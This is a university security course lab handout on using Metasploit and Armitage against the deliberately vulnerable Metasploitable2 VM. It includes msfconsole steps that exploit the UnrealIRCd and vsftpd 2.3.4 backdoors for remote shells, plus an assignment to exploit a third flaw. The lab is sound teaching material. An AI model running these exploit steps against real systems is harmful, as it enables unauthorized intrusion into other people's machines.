计算机科学与工程系

Department of Computer Science and Engineering

CS 315 Computer Security Course

Lab 4 Part 2: Metasploit Framework

Introduction

“If I had eight hours to chop down a tree, I’d spend the first six of them sharpening my axe.”
-Abraham Lincoln

In this lab, you will learn how to use Metasploit to gain access to a remote machine. The
goal is to teach you the basics of practical penetration testing. The Metasploit
Framework (MSF) contains a collection of exploits. It’s an infrastructure that you can
build upon and utilize for your custom needs. This helps you to concentrate on setting
up your exploitation environments, and not have to reinvent the wheel. MSF is one of
the most popular tools for security professionals conducting practical hacking studies. It
contains an extensive exploitation tools and working environments. Additionally, it is
free available to public.

We will use two Linux virtual machines: One is a Kali Linux with Metasploit framework
installed; and the other one is intentionally vulnerable Linux. We will use the Metasploit
framework on Kali Linux to remotely gain access on the vulnerable Linux machine.

Software Requirements
- The VMWare Software
• https://www.vmware.com/
- The VirtualBox Software
• https://www.virtualbox.org/wiki/Downloads
• https://www.vmware.com/support/developer/ovf/
• https://www.mylearning.be/2017/12/convert-a-vmware-fusion-virtual-
machine-to-virtualbox-on-mac/
- The Kali Linux, Penetration Testing Distribution
https://www.kali.org/downloads/
- Metasploit: Penetration Testing Software
http://www.metasploit.com/
- Metasploitable2: Vulnerable Linux Platform
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/

Fengwei Zhang – CS 315 Computer Security Course

Starting the Lab 4 Part 2 Virtual Machines

We need to use two VMs for this lab: the Kali Linux and the Metasploitable2-Linux.
First, select the Kali Linux and press Start up

Login the Kali Linux with username root, and password [TBA in the class]. Below is the
screen snapshot after login.

Fengwei Zhang – CS 315 Computer Security Course

Then, you select Metasploitble2-Linux, and press Start up. This is an intentionally
vulnerable Linux VM that you will attack against.

If you see the window below, just click OK. This is due to running two VM at the same
time.

Fengwei Zhang – CS 315 Computer Security Course

Log into the virtual machine with username, msfadmin, and password [TBA in Class].

After you log into the VM, you will see the screen below.

Fengwei Zhang – CS 315 Computer Security Course

Setting up the Environment for Metasploit on Kali Linux

Before you can use the Metasploit framework, you need to setup the environment such
as starting the database for it in Kali Linux.

After logging into the Kali Linux, open up a terminal by clicking the icon .

Metasploit Framework uses PostgreSQL as its database, so you need to launch it by

running the following command in the terminal:
$ service postgresql start
You can verify that PostgreSQL is running by executing the following command:
$ service postgresql status
With PostgreSQL up and running, you need to create and initialize the msf database by
executing the following command:
$ msfdb init

Fengwei Zhang – CS 315 Computer Security Course

The screenshot above shows the commands to start a database for Metasploit
Framework.

Fengwei Zhang – CS 315 Computer Security Course

Starting Metasploit Framework

You can lunch the Metasploit Console by click on the Metasploit icon or type
following command in a terminal.
$ msfconsole

You can use msfconsole to verify if the database is connected as shown in the
screenshot below.

Fengwei Zhang – CS 315 Computer Security Course

Type help in msf console, you get the core and database commands as shown below.

More: https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/

Fengwei Zhang – CS 315 Computer Security Course

Identifying the Attacking Target

For the purpose of this lab, it uses Metasploitable2-Linux as the attacking target. First,
we need to find the host IP address of the target to launch a remote exploitation. You
can use the command “ifconfig” (ipconfig is the windows equivalent). This command
allows you to find all the connected interfaces and network cards.
Go to the Metasploitable2-Linux VM, and execute the following command
$ iifconfig

From the screenshot above, we can see that the IP address of the network interface,
eth0, is 172.16.108.172. This is the IP address for the target that you will set later in this
lab. When you work on the lab in the classroom, you will get a different IP address for
your Metaploitable2-Linux VM. Note that this is not a public IP but we can access it
within the subset.

Fengwei Zhang – CS 315 Computer Security Course

Identifying the Vulnerabilities on the Target

The target, Metasploitable2-Linux, is an intentionally vulnerable machine. It contains

vulnerabilities that could be remotely exploited.

UnreaIRCD IRC Daemon Backdoor

On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. This version contains
a backdoor that went unnoticed for months - triggered by sending the letters "AB"
following by a system command to the server on any listening port. Metasploit has a
module to exploit this in order to gain an interactive shell.

Vsftpd v2.3.4 Backdoor

This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th
2011 and July 1st 2011 according to the most recent information available. This
backdoor was removed on July 3rd 2011. Metasploit can exploit the malicious backdoor
that was added to the vsftpd download archive.

There are more vulnerabilities that can be exploited on the target. You can find a list of
all the vulnerabilities for Metasploitable2 from here:
https://community.rapid7.com/docs/DOC-1875
and
http://chousensha.github.io/blog/2014/06/03/pentest-lab-metasploitable-2/

Fengwei Zhang – CS 315 Computer Security Course

Launching Attacks Using Metasploit Framework

After identifying the target and vulnerabilities, you can use your weapon (i.e., metasploit
framework) to launch attacks.
Go to Kali Linux, and start the Metasploit console by typing msfconsole in a terminal.
$ msfconsole
Set the module you want to use:
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
Here, we use the module for exploiting a backdoor of UnreaIRCD IRC daemon. Then,
set the remote host:
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 172.16.108.172
The IP address of my Metasploitable2 VM is 172.16.108.172. The VMs in Client Zero
(the desktops using in the classroom) have different IP addresses depending on the
network configuration. Lastly, type “exploit” to launch the attack.
msf exploit(unreal_ircd_3281_backdoor) > exploit

Fengwei Zhang – CS 315 Computer Security Course

The screenshot above shows the process of the exploitation using the Metasploit
console. We can see that Metasploit successfully gains a shell session, and we are able
to execute $ whoami and $ uname –a commands to show that we are in the
Metasploitable2 machine from the Kali Linux.

Using Vsftpd v2.3.4 Backdoor to Attack

The example above shows that you can remotely gain access to the target Linux using
a backdoor of UnreaIRCD IRC daemon. Now, we are going to use another vulnerability
of the target machine (i.e., Vsftpd backdoor) to launch an attack. The steps are similar
to the previous attack.
$ msconsole
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > set RHOST 172.16.108.172
msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > exploit
$ whoami
$ uname -a

Fengwei Zhang – CS 315 Computer Security Course

 Vsftpd Backdoor Command Execution Using Metasploit Framework

Fengwei Zhang – CS 315 Computer Security Course

Armitage - Cyber Attack Management for Metasploit

If you still struggle with the commands of msfconsole, Armitage can help you. Armitage
is a GUI tool for the Metasploit framework that makes penetration testing easy.

To start Armitage in Kali Linux, just type armitage in a terminal or click the icon

Then, you will get pop-up windows. Click “Connect” and “Yes”.

Fengwei Zhang – CS 315 Computer Security Course

If everything goes well, you should see the following GUI interface of Armitage.

Fengwei Zhang – CS 315 Computer Security Course

Click on the “Hosts” tab and then click on “Add Hosts”

In the pop-up Window, type the IP address of the Metasploitable2-Linux machine. Then,
click “add”

Fengwei Zhang – CS 315 Computer Security Course

After you add the Metasploitable2 Linux as a target host, right click the host entry and
select “Scan”. This will scan the host and identify its vulnerabilities.

Fengwei Zhang – CS 315 Computer Security Course

Before you can attack, you must choose your weapon. Armitage makes this process
easy. Select “Attacks” table and then click on “Find Attacks” to generate a custom
Attack menu for the host.

Fengwei Zhang – CS 315 Computer Security Course

Next, we will use the vulnerability, Vsftpd backdoor, mentioned to launch an attack.
Right click on the target host, select “Attack” -> “fpt” -> “vsftpd_234_backdoor”.

Fengwei Zhang – CS 315 Computer Security Course

Select “Use a reverse connection” and press “Launch”

The console in Armitage shows the exploitation is successfully launched.

Fengwei Zhang – CS 315 Computer Security Course

Right Click on the host entry and select “Shell 1” -> “Interact”

A new tab with the shell will open in the area below. I have typed commands “whoami”
and “uname –a” to show you that I have indeed successfully exploited the host.

Fengwei Zhang – CS 315 Computer Security Course

Assignments for the Lab 4 Part 2

1. Read the lab instructions above and finish all the tasks.
2. Why do we need to assign an internal IP address (i.e., behind NAT) for
Metasploitable2-Linux? What will happen if we assign a public IP to it?
3. Besides the two vulnerabilities we used, exploit another vulnerability using both
msfconsole and Armitage. Show me that you have placed a file in the exploited
remote machine via screenshots and by creating the file with the command
“touch <yourname>” where <yourname> should be replaced with your full name.

Happy Exploiting!

Fengwei Zhang – CS 315 Computer Security Course